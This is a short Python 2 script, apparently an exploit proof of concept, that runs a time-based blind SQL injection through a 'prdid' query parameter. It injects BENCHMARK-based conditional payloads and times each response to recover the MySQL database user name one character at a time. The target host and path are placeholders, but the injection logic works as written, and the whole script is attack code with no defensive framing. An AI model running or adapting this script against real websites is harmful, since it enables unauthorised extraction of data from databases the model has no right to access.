#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Cookie': '',
           'User-Agent': '',
           'Referer': ''}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 25):
    for payload in payloads:
        s = '/[Path]/[Par].html?prdid=if(ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0)&sellerid=1&source_detail=1&type=1' % (i, ord(payload))
        conn = httplib.HTTPConnection('url', timeout=30)
        conn.request(method='GET',url=s, headers=headers)
        t = time.time()
        conn.getresponse().read()
        conn.close()
        print '.',
        if time.time() - t > 1.5:
            user += payload
            print '\n[in progress]', user,
            time.sleep(1.0)
            break
        
print '\n[Done] MySQL user is %s' % user
